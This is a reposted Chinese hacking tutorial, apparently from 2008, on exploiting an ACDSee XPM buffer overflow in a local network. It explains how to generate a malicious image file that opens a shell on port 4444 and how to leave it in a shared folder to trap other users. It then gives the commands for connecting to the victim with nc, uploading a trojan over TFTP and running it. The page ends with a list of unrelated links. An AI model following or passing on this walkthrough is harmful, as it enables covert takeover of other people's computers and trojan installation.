从ACDSee的漏洞看木马入侵新思路

来源:百度文库 编辑:神马文学网 时间:2024/06/03 21:21:20

从ACDSee的漏洞看木马入侵新思路
2008-04-25 09:34:19 来源:中关村在线 作者:张齐 点击: 2025


        对于ACDSee的大名,想必各位都不陌生。不过最近ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在处理XBM/XPM/PSP/LHA文件时出现缓冲区溢出漏洞

对于ACDSee的大名,想必各位都不陌生。不过最近ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在处理XBM/XPM/PSP/LHA文件时出现缓冲区溢出漏洞,如果用户打开了带有超长字符串的XBM/XPM/PSP/LHA文件的话,就可能触发这些溢出,导致执行任意指令。
本次提到的漏洞影响的版本是ACDSee Photo Manager 9.0和ACDSee Photo Manager 8.1。我们下面就具体分析一下漏洞利用的全过程。
漏洞初显
假设在一个局域网中,终端上装有ACDSee 8.1。则这个漏洞就可以派上用场了!毕竟对于这类软件,用户更新较少,对于漏洞的利用率还是很高的。


ACDSee Pro 8.1
首先利用ACDSee XPM文件溢出利用工具,将其放到一个文件夹中,然后打开“记事本”,在其中输入如下的代码:acdsee.exe 1 test.xpm,然后保存为一个批处理文件1.bat,和利用工具acdsee.exe放到一个文件夹中。现在双击运行1.bat,就会在这个目录下面生成一个名字为test.xpm的文件了,这个XPM文件是默认被ACDSee程序关联打开的。
提醒用户,使用这个bat文件是为了执行命令的方便,你也可以在cmd中进入到这个目录中,然后执行“acdsee.exe 1 test.xpm”,效果是一样的。
我们可以先在终端上进行测试,运行XPM文件,打开ACDSee窗口后发现其处于崩溃状态。这就是溢出的结果了,下面只有在“任务管理器”里把ACDSee终结了,然后“命令提示符”窗口,在其中输入“netstat -an”命令来查看本机的端口开放情况,如果4444端口打开了,并且处于监听状态,可以说万事俱备。把这个文件发到共享区中,如果其它用户下载并开启了程序,则漏洞入侵就开始了。

4444端口打开了,并且处于监听状态

终端陷阱
静待一段时间,如果幸运的话,用扫描器扫描后会发现有4444端口开启的终端(如图6),下面就该用NC来连接肉鸡以实现控制了。打开“记事本”程序,在其中输入如下的代码:nc 192.168.0.151 4444 (192.168.0.151是目标终端的IP地址,4444就是它打开的待接端口),然后保存为一个批处理文件2.bat,和nc.exe放在同一个目录里。


端口扫描

双击运行2.bat这个文件,看见了?我们的NC顺利的连接上了肉鸡(如图7),并且返回了一个CMDShell,现在我们在这个窗口里的操作就等同于在肉鸡上执行命令了,嘻嘻。该是上传个木马的时候了,总不能什么都在这个命令提示符里操作吧,多不方便啊。说到上传木马,黑客最常用的就是tftp上传了,但是小菜们可能还不太熟悉tftp的使用,下面我来详细操作一下。
   上传木马
接下来的入侵方法就简单了,比如通过木马客户端,利用“TFTPD32”把它和我们要上传的木马muma.exe放到同一个一个目录下,运行它之后就会自动在本机搭建一个TFTP服务器了。最后,将TFTPD32最小化,在刚刚得到的CMDShell里输入如下命令并回车确定: tftp -i 192.168.0.149 get muma.exe D:\muma.exe,就可以看到上传成功的显示了。


IPConfig

TFTPD32

192.168.0.149是本地的IP地址,这条命令作用是把本机上的和TFTPD32在同一目录下的muma.exe上传到192.168.0.151上,并且放置到D:\下。如果muma.exe不是和TFTPD32.exe放在同一目录下的话,也可以把上句中的muma.exe换成绝对路径,比如C:\windows\muma.exe,一样可以成功上传。
输入命令muma.exe运行即可,至此,一次完整的漏洞利用及入侵过程就结束了,ACDSee的这个漏洞非常隐蔽,但对于局域网用户来说却异常可怕,管理员还是批量升级软件吧。
从ACDSee的漏洞看木马入侵新思路 (转贴)怎样防止电脑漏洞?防止木马入侵? (转贴)怎样防止电脑漏洞?防止木马入侵? 从中学校长贪污受贿千万看我国的教育设计漏洞 一招废掉所有木马入侵 从中学校长贪污受贿千万看我国的教育设计漏洞 - 新华博客 - News Blog 从中学校长贪污受贿千万看我国的教育设计漏洞 - 新华博客 - News Blog 系统安全:从进程寻找木马的痕迹 从施耐德入侵看“柳市之变” 如何让网站安全防范木马入侵 如何让网站安全防范木马入侵 木马入侵常见手法及其防范 推荐使用强大的影像编辑与看图软件----ACDSee Pro2.5.363(专业版)简体中... ASP网站漏洞解析及黑客入侵防范方法 使用 ACDsee 的一点小技巧 木马群利用Flash插件漏洞大规模泛滥 0day漏洞作恶 "假面"木马化身快捷方式 微软曝快捷方式0day漏洞 “双子”木马借机传播 利用思易ASP木马追捕入侵站点 教你防范网页木马 入侵原理完全解析 ACDSee 5.0 简体中文版看图软件使用教程 ACDSee 5.0 简体中文版看图软件使用教程 从基本面谈炒股新思路(一) 从基本面谈炒股新思路(二)